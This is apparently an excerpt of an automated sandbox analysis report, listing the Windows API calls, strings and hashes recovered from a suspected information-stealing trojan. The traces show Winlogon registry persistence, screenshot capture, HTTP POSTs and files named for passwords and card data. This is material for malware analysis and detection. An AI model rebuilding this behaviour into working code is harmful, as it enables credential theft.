                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: 61C5C435$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$P0Mw$RFK
                                                                                                                                                                                                              • API String ID: 505831200-2085081953
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C10,774D3050,774D30D0,774D3080), ref: 012F50B7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F50BA
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000C10), ref: 012F50CE
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 012F50F5
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 012F5113
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F511D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F5120
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F512D
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F5130
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 012F5148
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F514F
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000C13), ref: 012F515F
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 012F5175
                                                                                                                                                                                                              • htons.WS2_32(00000000), ref: 012F51A1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 012F51D1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F51D4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 012F51E4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F51E7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$AllocFreeTableValidatememset$htonsinet_addr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1718479325-0
                                                                                                                                                                                                              • Opcode ID: 094d44b459ab5abd19127ec4f6e0c9fed80b4552d04f19259344c89ad671f874
                                                                                                                                                                                                              • Instruction ID: 8adeadacf73490a5bb3e930cc5031ecd7d670ff3a5ae2fd3ca01d1afce03d7c0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 094d44b459ab5abd19127ec4f6e0c9fed80b4552d04f19259344c89ad671f874
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C418F71910316ABEB30AF69CC48FAFBB6CAF44750F15812CFB0597285DB75A641CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F5250
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F527C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F52A3
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000005), ref: 012F52D4
                                                                                                                                                                                                              • strstr.MSVCRT(?,), ref: 012F52FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,Content-Length: ), ref: 012F5315
                                                                                                                                                                                                              • StrToIntA.SHLWAPI(-00000010), ref: 012F5323
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000004), ref: 012F5355
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$Readmemcpystrstr
                                                                                                                                                                                                              • String ID: $Content-Length: $POST
                                                                                                                                                                                                              • API String ID: 2509092961-2076583852
                                                                                                                                                                                                              • Opcode ID: 0ff090ac6d3db6bb54d9f0bac52837ffe7f6fae5a7d559330b73669047fafcdf
                                                                                                                                                                                                              • Instruction ID: ffc829de866519d307a974aea1595df0dcdc80d2dd644045f1806a7cfb25023d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ff090ac6d3db6bb54d9f0bac52837ffe7f6fae5a7d559330b73669047fafcdf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D716C71E1031AAFDB20DFA8D984AAEFBF8FB48704F04412DEA44E7245D774A9018F94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(01339B58,774D30D0,00000000), ref: 01304A43
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?,75980180), ref: 01304A6D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 01304A8D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 01304ABA
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,01339B58), ref: 01304ABE
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,00000000,00000002), ref: 01304B60
                                                                                                                                                                                                                • Part of subcall function 012F41B0: GetProcessHeap.KERNEL32(00000000,00000000,7597EA50,01304B6D), ref: 012F41BE
                                                                                                                                                                                                                • Part of subcall function 012F41B0: HeapValidate.KERNEL32(00000000), ref: 012F41C1
                                                                                                                                                                                                                • Part of subcall function 012F41B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F41CE
                                                                                                                                                                                                                • Part of subcall function 012F41B0: HeapFree.KERNEL32(00000000), ref: 012F41D1
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 01304B71
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 01304B7B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Value$ProcessQuery$CloseExistsFileFlushFreeOpenPathValidate
                                                                                                                                                                                                              • String ID: software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 579956326-3814317876
                                                                                                                                                                                                              • Opcode ID: 7f636223a24a43732f8902b93ce3c49dfbdaac1c9788ba9998cb5f9281aa0864
                                                                                                                                                                                                              • Instruction ID: 5d7587554def6a97328d88a43eb364d35d1fbb3d18c1d90c04ca8949578abb04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f636223a24a43732f8902b93ce3c49dfbdaac1c9788ba9998cb5f9281aa0864
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0651DC75604206BFEB22AF689C68FFABBFDEF44708F104158FA4197245E6719B05C790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?,00000000,?), ref: 012FE1D1
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 012FE209
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FE23D
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FE273
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(00000000), ref: 012FE2B9
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FB980,00000000,00000000,00000000,00000000,00000000), ref: 012FE338
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FE350
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FE361
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,bsi.dll,?,00000000,?), ref: 012FE387
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,012F8F74), ref: 012FE3C4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashHandle$CloseCreateExistsFileInformationThreadmemcpymemsetstrstr
                                                                                                                                                                                                              • String ID: 61C5C0CB$<L>$POST$bsi.dll$pass.log
                                                                                                                                                                                                              • API String ID: 4177962767-3724775876
                                                                                                                                                                                                              • Opcode ID: 0fd2831e03d02e06aaf3cb882dcd58a6bc69e2c1667b77ebfe38c885f8a104be
                                                                                                                                                                                                              • Instruction ID: 7e2cfe3054a01a5f32ddc6ff5d169184f1e232b54a3feba7c23b0dfe36132e14
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fd2831e03d02e06aaf3cb882dcd58a6bc69e2c1667b77ebfe38c885f8a104be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4251283151021A9BDB32AF38E81CBEAFBE8FB44705F16416CEB4497291DBB1D944CB94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,774D0F00,00000000,00000000), ref: 012F3821
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,774D0F00,00000000,00000000), ref: 012F383C
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,774D0F00,00000000,00000000), ref: 012F3856
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?,?,?,?,774D0F00,00000000,00000000), ref: 012F386C
                                                                                                                                                                                                                • Part of subcall function 012E6C70: memset.MSVCRT(?,00000000,000000FF,00000000), ref: 012E6CA1
                                                                                                                                                                                                                • Part of subcall function 012E6C70: memset.MSVCRT(?,00000000,00000103,?,00000000,000000FF,00000000), ref: 012E6CBF
                                                                                                                                                                                                                • Part of subcall function 012E6C70: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 012E6CDB
                                                                                                                                                                                                                • Part of subcall function 012E6C70: RegQueryValueExA.ADVAPI32(?,9E2B3B9Fa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 012E6D02
                                                                                                                                                                                                                • Part of subcall function 012E6C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 012E6D7A
                                                                                                                                                                                                                • Part of subcall function 012E6C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 012E6D81
                                                                                                                                                                                                                • Part of subcall function 012E6C70: memset.MSVCRT(00000000,00000000,00000110,?,?,?,?,?,00000000), ref: 012E6D95
                                                                                                                                                                                                                • Part of subcall function 012E6C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 012E6DAE
                                                                                                                                                                                                                • Part of subcall function 012E6C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 012E6DBC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,774D0F00,00000000,00000000), ref: 012F38BB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,774D0F00,00000000,00000000), ref: 012F38C2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,774D0F00,00000000,00000000), ref: 012F38CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,774D0F00,00000000,00000000), ref: 012F38D5
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000001,00000000,00000000,/topic.php,?,00000001,00000001,00000000,00000000,00000001,?,?,?,774D0F00), ref: 012F394D
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,?,?,774D0F00,00000000,00000000), ref: 012F395A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,774D0F00,00000000,00000000), ref: 012F3998
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,774D0F00,00000000,00000000), ref: 012F399B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,774D0F00,00000000,00000000), ref: 012F39A7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,774D0F00,00000000,00000000), ref: 012F39AA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$File$FreeTempValidate$AllocAttributesCloseDeleteNameOpenPathQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: /topic.php
                                                                                                                                                                                                              • API String ID: 870369024-224703247
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 012FA1CA
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012FA1D7
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 012FA1F4
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F9E40,?,00000000,00000000,00000000,00000000), ref: 012FA23E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FA256
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FA267
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 012FA279
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 012FA291
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,name=%s&port=%u,%53%59%53%54%45%4D%21%38%34%31%36%31%38%21%30%32%35%46%39%30%34%39,?), ref: 012FA2B1
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000000,/home.php,?,00000001,?,?,00000001,00000000), ref: 012FA327
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012FA334
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleInformationPathTemp$AttributesBackslashCloseCreateDeleteEnvironmentNameThreadVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: %53%59%53%54%45%4D%21%38%34%31%36%31%38%21%30%32%35%46%39%30%34%39$/home.php$SystemDrive$name=%s&port=%u
                                                                                                                                                                                                              • API String ID: 1291007772-2359251745
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133CF94), ref: 01303367
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 013033A9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 013033B5
                                                                                                                                                                                                              • #680.SHELL32 ref: 013033B9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013033CA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 013033D1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01303402
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01303408
                                                                                                                                                                                                              • #680.SHELL32 ref: 0130340C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0130341D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01303424
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s\%02d.bmp,?,00000001), ref: 01303452
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 01303468
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$#680CreateDirectoryFolderMakeSystem$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                              • API String ID: 3389723127-1670482240
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c031), ref: 012FE5B0
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c031), ref: 012FE5ED
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FE602
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FE60C
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FE614
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FE625
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FE62C
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 012FE639
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c031,?,?), ref: 012FE661
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,61c5c031,0132A2F8), ref: 012FE67F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012FE682
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012FE68F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012FE692
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapPath$Backslash$DirectoryErrorLastProcess$#680CreateCurrentFolderFreeMakeSystemValidate
                                                                                                                                                                                                              • String ID: 61c5c031$cc.txt
                                                                                                                                                                                                              • API String ID: 3733170206-123849419
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 013031EC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013031FD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 01303211
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0130321F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00023080,00000000,00000000,00000000), ref: 01303234
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40), ref: 01303245
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0130324A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0130325E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0130326C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435), ref: 01303277
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C435,RFK), ref: 01303291
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0130329A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: 61C5C435$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$P0Mw$RFK
                                                                                                                                                                                                              • API String ID: 505831200-2085081953
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 012EA25E
                                                                                                                                                                                                                • Part of subcall function 012EE250: GetWindowLongA.USER32(012ECE3A,000000F0,7707BCB0,7707BCB0,00000000), ref: 012EE26B
                                                                                                                                                                                                                • Part of subcall function 012EE250: GetLastActivePopup.USER32(012ECE3A,?,?,?,?,?,?,?,?,?,?,?,?,?,012ECE3A,7707BCB0), ref: 012EE279
                                                                                                                                                                                                                • Part of subcall function 012EE250: GetWindow.USER32(?,00000005,00000001), ref: 012EE293
                                                                                                                                                                                                                • Part of subcall function 012EE250: GetWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,012ECE3A,7707BCB0), ref: 012EE296
                                                                                                                                                                                                                • Part of subcall function 012EE250: GetWindowInfo.USER32(00000000,?), ref: 012EE2AC
                                                                                                                                                                                                                • Part of subcall function 012EE250: GetWindow.USER32(00000000,00000004), ref: 012EE2B5
                                                                                                                                                                                                                • Part of subcall function 012EE250: GetWindow.USER32(00000000,00000003), ref: 012EE2EE
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000010,00000000,00000000,00000000), ref: 012EA29F
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002,00000000), ref: 012EA325
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?,00000000), ref: 012EA34C
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000020,00000000,00000001,00000000), ref: 012EA391
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000001,?,00000000), ref: 012EA3E5
                                                                                                                                                                                                                • Part of subcall function 012EA100: GetTickCount.KERNEL32(00000000,77063610,00000000,?,012EA417,00000000), ref: 012EA18A
                                                                                                                                                                                                                • Part of subcall function 012EA100: GetClassLongA.USER32(00000000,000000E6,?,012EA417,00000000), ref: 012EA1DD
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000112,?,?), ref: 012EA44E
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 012EA479
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,0000007B,00000000,00000000,00000000,?), ref: 012EA4F5
                                                                                                                                                                                                              • GetSystemMenu.USER32(00000000,00000000), ref: 012EA514
                                                                                                                                                                                                              • GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 012EA538
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000,00000000,00000001,?,?,012E9523,00008001,?,00000000,00000000), ref: 012EA5A3
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000,00000000,?), ref: 012EA5B6
                                                                                                                                                                                                              • PostMessageA.USER32(?,?,00000001,00000000,?,?,?,?,?,?,?,?,012E9523,00008001,?,00000000), ref: 012EA5D9
                                                                                                                                                                                                              • PostMessageA.USER32(?,?,00000002,00000000,?,?,?,?,?,?,?,?,012E9523,00008001,?,00000000), ref: 012EA5FB
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000,00000001,00000001,00000000,?), ref: 012EA633
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000,00000080,00000001,?,00000112,?,00000000), ref: 012EA65D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 590198697-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,774CF590,774C16B0,?), ref: 012E902F
                                                                                                                                                                                                              • GetDC.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9037
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9048
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9059
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9070
                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 012E90B2
                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 012E90C2
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 012E90C5
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 012E90CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 012E9129
